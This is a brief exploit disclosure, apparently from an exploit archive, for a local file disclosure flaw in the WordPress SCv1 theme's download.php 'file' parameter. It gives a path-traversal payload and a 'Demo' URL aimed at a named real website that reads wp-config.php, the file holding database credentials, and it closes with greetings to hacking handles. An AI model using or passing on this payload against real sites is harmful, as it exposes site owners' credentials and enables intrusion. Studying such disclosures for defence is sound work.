[+] Title : Wordpress SCv1 Theme Local File Disclosure [+] Discovered By : Medrik [+] CMS Home-Page : http://wordpress.org [+] Found Date : 2014-06-10 [+] Tested On : Windows This is LFD Vulnerability In : File : download.php Parameter : file Vulnerability (Locate) : http://Vulnerable_Host/wp-content/themes/SCv1/download.php?file=[LFD] Demo : http://susannahcahalan.com/wp-content/themes/SCv1/download.php?file=../../../../wp-config.php Spc Tnx : Beni_Vanda , Black_KinG , M.R.S.CO , Dr.3v1l , 8ThBiT